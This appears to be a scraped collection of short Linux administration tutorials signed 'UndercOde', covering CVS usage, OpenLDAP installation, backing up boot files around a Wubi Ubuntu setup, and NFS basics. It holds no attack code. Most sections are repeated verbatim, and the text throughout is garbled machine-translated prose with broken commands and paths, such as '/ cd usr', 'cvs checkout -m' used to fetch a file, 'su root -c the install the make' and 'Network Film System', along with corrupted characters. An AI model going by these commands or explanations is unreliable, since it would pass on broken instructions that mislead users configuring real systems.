We just provide a basic application here. The real details of the cvs application are very complicated. We only introduce some introductions here. Friends with interest can read its installation documentation.
B) 1) Application examples
( use cvs system on the host, you can telnet to the host, and then use, and no difference in the use of this machine, so this has been no mention of)
2) the assumption in the above example tom on the system you want to use cvs cvs host to everyone and collaborative development. It is the first camp to configure some of their own environment variables first edit / etc / services '' adding:
cvspserver 2401 / tcp
then add the following code to the .profile file
CVSROOT =: etx: psever: tom@cvs.exam.org: / cvsroot
Export CVSROOT
3) so he can use $ cvs login to log in. Below we will use tom The specific use is to explain the application of cvs. Like other linux commands. Cvs also has a large number of parameters. We will make a list in the next section.
Tom has the following file
Ecample.c exampl2.c tes1 in the / usr / test directory .c test2.c utimel.c tty.c
If you want to create your own directory in the software library
$ cd / usr / test
~ test $ cvs import βm βtom first creationβ tomdir tom tomwork
N tomdit / example.c
N tomdit / exampl2.c
N tomdir / test1.c
N tomdir / test2.c
N tomdir / utmel.c
N tomdit / tty.c
4) No conflicts creat by this import
command description import submit command -m followed by description.tom publisher tomwork is a release Label. If the prompt CVSROOT is wrong, you can use--d and add CVSROOT
Note: For all cvs commands, you can use cvs command -H to get help. At this time, there is a tomdir subdirectory under the / cvs directory on the server side. Contents:
example.c, v exampl2.c, v test1.c, v test2 .c, v tty.c, v utimel.c, v
This time the first submission is completed.
This way, you don't need to worry about accidentally deleting the test directory. Use the following command to check out a backup of the source file from the software library
$ / cd usr
`` usr $ / cvs checkout test tomdir-r 1.1
U test / exsample.c
U test / exampl1.c
U test / test1.c
U test / test2.c
U test / tty.c
U test / ulnem.c
6) The cvs checkout command is to get the latest version by default. We can also get an old version. This command is to remove the 1.1 version of tomdir code. After recovery, a CVS directory is added to manage the test directory. When submitting or modifying once, it interfaces with the management files on the server to ensure a good version. This example is very small. In reality, it is very likely that there are many files in the project, so you can restore the CVSROOT module first
~ usr / $ cvs checkout CVSROOT / mouldes
~ / usr / $ vi CVSROOT / mouldes Edit the module name, such as we add
src p to the end of the file roject / src
print project / src / print
After cvs commit
, we can use cvs checkout print instead of
cvs checkout project / src / print
. After editing, we can commit the file
~ usr / $ cvs commit -m βedit of mouldes nameβ CVSROOT / mould except that we can restore the entire directory. You can restore a single file or module
~ usr / test / $ cvs checkout -m "newer file" tty.c
After restoring the file, tom can use various editors to modify the source file and submit it after the modification is completed The result of its work is
~ / usr / cvs commit test tomdir. In
this way, tom has completed an update of the source file. Other similar reasons can be obtained
~ usr / test / $ cvs checkout -m "newer file" tty.c
After restoring the file, tom can use various editors to modify the source file and submit it after the modification is completed The result of its work is
~ / usr / cvs commit test tomdir. In
this way, tom has completed an update of the source file. Other similar reasons can be obtained
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β βThis media is not supported in your browser
VIEW IN TELEGRAM
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ OpenLDAP Quick Installation Guide
twitter.com/UndercOdeTc
1) Obtain software
http://www.openldap.org/software/download/
http://www.openldap.org/software/repo.html
2) Unzip
gunzip -c openldap-VERSION.tgz | tar xfB-
at An ldap subdirectory will be created in the working directory.
3) Read README and INSTALL carefully
4) Run configure
./configure to
see the options of
configure ./configure --help
5) Compile
make depend
make
6) Test the compilation results
cd tests
make
cd.
7) Install the software
su root -c the install the make
8), a configuration file created SLAPD
editing /usr/local/etc/slapd.conf file, LDBM database definition file contains the following formats
database LDBM
suffix "" MY-DOMAIN = DC, the COM DC = ""
the rootdn " "cn = Manager, dc = MY-DOMAIN, dc = COM" "
The rootpw secret
> replaces the above MY-DOMAIN and COM into the actual domain name, for example:
database ldbm
suffix "" dc = mydomain, dc = com ""
rootdn "" cn = Manager, dc = mydomain, dc = com ""
rootpw secret
sample slapd.conf is placed in /usr/local/etc/openldap/slapd.conf
9)Start SLAPD
su root -c / usr / local / libexec / slapd -f myslapd.conf
slapd is installed in the "" libexecdir "specified in the configuration file "Directory, usually / usr / local / libexec / slpad.
10) increasing the initial entry (entries It)
. 1) to create an LDIF file
edit an LDIF format:
DN: DC = MY-DOMAIN, DC = the COM
DC: MY-DOMAIN
O: MY-the ORGANIZATION
objectClass: Organization
objectClass: dcObject
DN: CN = Manager, dc = MY-DOMAIN, dc = COM
cn: Manager
sn: Manager
objectclass: person
π¦ Run ldapadd
ldapadd -D "" cn = Manager, dc = MY-DOMAIN, dc = COM "" -W <myldif.ldif
11)Check whether it has started working normally
ldapsearch -L -b "" dc = MY-DOMAIN, dc = COM "" "" (objectclass = *) ""
For example:
ldapsearch -L -b "" dc = mydomain, dc = com "" -W "" (objectclass = *) ""
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ OpenLDAP Quick Installation Guide
twitter.com/UndercOdeTc
1) Obtain software
http://www.openldap.org/software/download/
http://www.openldap.org/software/repo.html
2) Unzip
gunzip -c openldap-VERSION.tgz | tar xfB-
at An ldap subdirectory will be created in the working directory.
3) Read README and INSTALL carefully
4) Run configure
./configure to
see the options of
configure ./configure --help
5) Compile
make depend
make
6) Test the compilation results
cd tests
make
cd.
7) Install the software
su root -c the install the make
8), a configuration file created SLAPD
editing /usr/local/etc/slapd.conf file, LDBM database definition file contains the following formats
database LDBM
suffix "" MY-DOMAIN = DC, the COM DC = ""
the rootdn " "cn = Manager, dc = MY-DOMAIN, dc = COM" "
The rootpw secret
> replaces the above MY-DOMAIN and COM into the actual domain name, for example:
database ldbm
suffix "" dc = mydomain, dc = com ""
rootdn "" cn = Manager, dc = mydomain, dc = com ""
rootpw secret
sample slapd.conf is placed in /usr/local/etc/openldap/slapd.conf
9)Start SLAPD
su root -c / usr / local / libexec / slapd -f myslapd.conf
slapd is installed in the "" libexecdir "specified in the configuration file "Directory, usually / usr / local / libexec / slpad.
10) increasing the initial entry (entries It)
. 1) to create an LDIF file
edit an LDIF format:
DN: DC = MY-DOMAIN, DC = the COM
DC: MY-DOMAIN
O: MY-the ORGANIZATION
objectClass: Organization
objectClass: dcObject
DN: CN = Manager, dc = MY-DOMAIN, dc = COM
cn: Manager
sn: Manager
objectclass: person
π¦ Run ldapadd
ldapadd -D "" cn = Manager, dc = MY-DOMAIN, dc = COM "" -W <myldif.ldif
11)Check whether it has started working normally
ldapsearch -L -b "" dc = MY-DOMAIN, dc = COM "" "" (objectclass = *) ""
For example:
ldapsearch -L -b "" dc = mydomain, dc = com "" -W "" (objectclass = *) ""
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Introduction to OpenLDAPOPENLDAP is a very powerful tool for accessing network resources.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ
Introduction to OpenLDAPOPENLDAP is a very powerful tool for accessing network resources.
1) Download: ftp // ftp.OpenLDAP.org / pub / OpenLDAP / openldap-release / openldap-1.2.10.tgz
2) find it very useful after installation.
Unzip it first:
#tar xzvf $ ver_ldap.tgz
3) and compile and install:
#. / Configure --prefix = $ ldap --enable-dns --enable-cldap --enable-ldapd --enable-wrappers --enable-phonetic- -enable-passwd --enable-shell
#make depend
#make
#make install
4) Modify the configuration file:
add in / etc / profile:
PATH = "" "" $ "" "" PATH: $ ldap / bin: $ ldap / sbin : $ ldap / libexec
CPLUS_INCLUDE_PATH = "" "" $ "" "" CPLUS_INCLUDE_PATH: $ ldap / include
LD_LIBRARY_PATH = "" "" $ "" "" LD_LIBRARY_PATH: $ ldap / lib
LIBRARY_PATH = ""
5) export PATH CPLUS_INCLUDE_PATH LD_LIBRARY_PATH LIBRARY_PATH MANPATH
in /etc/rc.d/rc.local
su root -c `` $ ldap / libexec / slapd -f $ ldap / etc / openldap / slapd.conf ''
6) recompile PHP and bring The parameter --with-ldap = $ ldap makes PHP support openLDAP.
After recompiling and installing, your WEBSERVER will really support openLDAP. I will introduce the wonderful application of openLDAP in the future! !! !!
7) Download: ftp // ftp.OpenLDAP.org / pub / OpenLDAP / openldap-release / openldap-1.2.10.tgz
I find it very useful after installation.
Unzip it first:
#tar xzvf $ ver_ldap.tgz
and compile and install:
#. / Configure --prefix = $ ldap --enable-dns --enable-cldap --enable-ldapd --enable-wrappers --enable-phonetic- -enable-passwd --enable-shell
#make depend
#make
#make install
8) Modify the configuration file:
add in / etc / profile:
PATH = "" "" $ "" "" PATH: $ ldap / bin: $ ldap / sbin : $ ldap / libexec
CPLUS_INCLUDE_PATH = "" "" $ "" "" CPLUS_INCLUDE_PATH: $ ldap / include
LD_LIBRARY_PATH = "" "" $ "" "" LD_LIBRARY_PATH: $ ldap / lib
LIBRARY_PATH = ""
9) export PATH CPLUS_INCLUDE_PATH LD_LIBRARY_PATH LIBRARY_PATH MANPATH
in /etc/rc.d/rc.local
su root -c `` $ ldap / libexec / slapd -f $ ldap / etc / openldap / slapd.conf ''
10) recompile PHP and bring The parameter --with-ldap = $ ldap makes PHP support openLDAP.
After recompiling and installing, your WEBSERVER will really support openLDAP. I will introduce the wonderful application of openLDAP in the future! !! !!
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Introduction to OpenLDAPOPENLDAP is a very powerful tool for accessing network resources.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ
Introduction to OpenLDAPOPENLDAP is a very powerful tool for accessing network resources.
1) Download: ftp // ftp.OpenLDAP.org / pub / OpenLDAP / openldap-release / openldap-1.2.10.tgz
2) find it very useful after installation.
Unzip it first:
#tar xzvf $ ver_ldap.tgz
3) and compile and install:
#. / Configure --prefix = $ ldap --enable-dns --enable-cldap --enable-ldapd --enable-wrappers --enable-phonetic- -enable-passwd --enable-shell
#make depend
#make
#make install
4) Modify the configuration file:
add in / etc / profile:
PATH = "" "" $ "" "" PATH: $ ldap / bin: $ ldap / sbin : $ ldap / libexec
CPLUS_INCLUDE_PATH = "" "" $ "" "" CPLUS_INCLUDE_PATH: $ ldap / include
LD_LIBRARY_PATH = "" "" $ "" "" LD_LIBRARY_PATH: $ ldap / lib
LIBRARY_PATH = ""
5) export PATH CPLUS_INCLUDE_PATH LD_LIBRARY_PATH LIBRARY_PATH MANPATH
in /etc/rc.d/rc.local
su root -c `` $ ldap / libexec / slapd -f $ ldap / etc / openldap / slapd.conf ''
6) recompile PHP and bring The parameter --with-ldap = $ ldap makes PHP support openLDAP.
After recompiling and installing, your WEBSERVER will really support openLDAP. I will introduce the wonderful application of openLDAP in the future! !! !!
7) Download: ftp // ftp.OpenLDAP.org / pub / OpenLDAP / openldap-release / openldap-1.2.10.tgz
I find it very useful after installation.
Unzip it first:
#tar xzvf $ ver_ldap.tgz
and compile and install:
#. / Configure --prefix = $ ldap --enable-dns --enable-cldap --enable-ldapd --enable-wrappers --enable-phonetic- -enable-passwd --enable-shell
#make depend
#make
#make install
8) Modify the configuration file:
add in / etc / profile:
PATH = "" "" $ "" "" PATH: $ ldap / bin: $ ldap / sbin : $ ldap / libexec
CPLUS_INCLUDE_PATH = "" "" $ "" "" CPLUS_INCLUDE_PATH: $ ldap / include
LD_LIBRARY_PATH = "" "" $ "" "" LD_LIBRARY_PATH: $ ldap / lib
LIBRARY_PATH = ""
9) export PATH CPLUS_INCLUDE_PATH LD_LIBRARY_PATH LIBRARY_PATH MANPATH
in /etc/rc.d/rc.local
su root -c `` $ ldap / libexec / slapd -f $ ldap / etc / openldap / slapd.conf ''
10) recompile PHP and bring The parameter --with-ldap = $ ldap makes PHP support openLDAP.
After recompiling and installing, your WEBSERVER will really support openLDAP. I will introduce the wonderful application of openLDAP in the future! !! !!
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Install, reinstall windows backup Ubuntuβwubi by UndercOde :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ
1) Back up a few small files. Before reinstalling windos, back up the wubidr, wubidr.mbr, boot.ini, bootfontbin, NTDETECT.COM, and NTLDR files in the C drive, and find them outside the C drive and save them. The above files are hidden system files. I believe you will find them if you
> install the system.
There are a few files that may not need to be changed, so I don't need to study them carefully. Copy and save them together. They are all very small.
2) Install it. I do nβt need to teach Windows
3) After installing the system, replace the backup files with the files of the same name in the C drive
It's over. It's that simple. After the restart everything is OK. Then use your dual system or ubuntu
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Install, reinstall windows backup Ubuntuβwubi by UndercOde :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ
1) Back up a few small files. Before reinstalling windos, back up the wubidr, wubidr.mbr, boot.ini, bootfontbin, NTDETECT.COM, and NTLDR files in the C drive, and find them outside the C drive and save them. The above files are hidden system files. I believe you will find them if you
> install the system.
There are a few files that may not need to be changed, so I don't need to study them carefully. Copy and save them together. They are all very small.
2) Install it. I do nβt need to teach Windows
3) After installing the system, replace the backup files with the files of the same name in the C drive
It's over. It's that simple. After the restart everything is OK. Then use your dual system or ubuntu
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is the NFS file systemβ What is NFS? Full by UndercOde :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ
1) Network Film Systemγγγγ
NFS was developed by Sun Corporation and launched in 1984. NFS is an RPC service that enables us to achieve file sharing. It is designed to be used between different systems, so it The communication protocol design has nothing to do with the host and operating system. When users want to use remote files, they only need to use "mount" to mount the remote file system under their own file system. no two machines file.
2) machine a machine B
/ /
bin bin etc etc usr usr
man local man Share
3) If we on machine a, / usr / man machine should on machine a is attached to B / usr / man long Mount machine_name: / usr / man / usr / home
4) can mount over. And we can not only mount the directory, but also a file. After mounting, we can only do reading (or writing) on ββthe file, but you can not put this file or directory move, delete out on the remote machie, but it should be noted that as we mount / usr, can no longer mount / usr directory under, or an error will occur
5) Servers & Clients
NFS is to enable files on Servers to be mounted by other machines and achieve resource sharing. The machine that enjoys these files can be called a client. A client can mount a file or a hierarchy of files (file hierarchies) from the server. However, in fact, any machine can be an NFS server or NFS client, even NFS server and NFS client.
6) Servers Exporting & Clients Mounting
NFS server The files or directories exported are recorded in / etc / exports In a file, when we start the NFS server, this script in /etc/rc.local will automatically start the exportfs program, search for the existence of the file / etc / exports, and give the correct permissions to all exports. File hierarchies.
7) However, it should be noted that only the paths exported by the server can be mounted by the NFS client. Similarly, when the client is started, the system will automatically mount all server export paths, and all paths to the mount will be recorded Under / etc / fstab, the fstab file similar to the following
/ dev / sd0a / 4.2 rw 1 1
/ dev / sd0h / tmp 4.2 rw 1 3
/ dev / sd0g / usr 4.2 rw 1 2
/ dev / fd0 / pcfs pcfs rw, noauto 0 0
sparc20: / swap / swap nfs rw, intr, bg, soft 0 0
sparc17: / home / home nfs rw, intr, bg, soft 0 0
sparc17: / home3 / home3 nfs rw, intr, bg, soft 0 0
sparc14: / home4 / home4 nfs rw, intr, bg, soft 0 0
sparc20: / home2 / home2 nfs rw, intr, bg, soft 0 0
sparc20: / var / spool / mail / var / spool / mail nfs rw, intr, bg, soft 0 0
rs970: / home1 / home1 nfs rw, intr, bg , Soft 0 0
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is the NFS file systemβ What is NFS? Full by UndercOde :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ
1) Network Film Systemγγγγ
NFS was developed by Sun Corporation and launched in 1984. NFS is an RPC service that enables us to achieve file sharing. It is designed to be used between different systems, so it The communication protocol design has nothing to do with the host and operating system. When users want to use remote files, they only need to use "mount" to mount the remote file system under their own file system. no two machines file.
2) machine a machine B
/ /
bin bin etc etc usr usr
man local man Share
3) If we on machine a, / usr / man machine should on machine a is attached to B / usr / man long Mount machine_name: / usr / man / usr / home
4) can mount over. And we can not only mount the directory, but also a file. After mounting, we can only do reading (or writing) on ββthe file, but you can not put this file or directory move, delete out on the remote machie, but it should be noted that as we mount / usr, can no longer mount / usr directory under, or an error will occur
5) Servers & Clients
NFS is to enable files on Servers to be mounted by other machines and achieve resource sharing. The machine that enjoys these files can be called a client. A client can mount a file or a hierarchy of files (file hierarchies) from the server. However, in fact, any machine can be an NFS server or NFS client, even NFS server and NFS client.
6) Servers Exporting & Clients Mounting
NFS server The files or directories exported are recorded in / etc / exports In a file, when we start the NFS server, this script in /etc/rc.local will automatically start the exportfs program, search for the existence of the file / etc / exports, and give the correct permissions to all exports. File hierarchies.
7) However, it should be noted that only the paths exported by the server can be mounted by the NFS client. Similarly, when the client is started, the system will automatically mount all server export paths, and all paths to the mount will be recorded Under / etc / fstab, the fstab file similar to the following
/ dev / sd0a / 4.2 rw 1 1
/ dev / sd0h / tmp 4.2 rw 1 3
/ dev / sd0g / usr 4.2 rw 1 2
/ dev / fd0 / pcfs pcfs rw, noauto 0 0
sparc20: / swap / swap nfs rw, intr, bg, soft 0 0
sparc17: / home / home nfs rw, intr, bg, soft 0 0
sparc17: / home3 / home3 nfs rw, intr, bg, soft 0 0
sparc14: / home4 / home4 nfs rw, intr, bg, soft 0 0
sparc20: / home2 / home2 nfs rw, intr, bg, soft 0 0
sparc20: / var / spool / mail / var / spool / mail nfs rw, intr, bg, soft 0 0
rs970: / home1 / home1 nfs rw, intr, bg , Soft 0 0
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β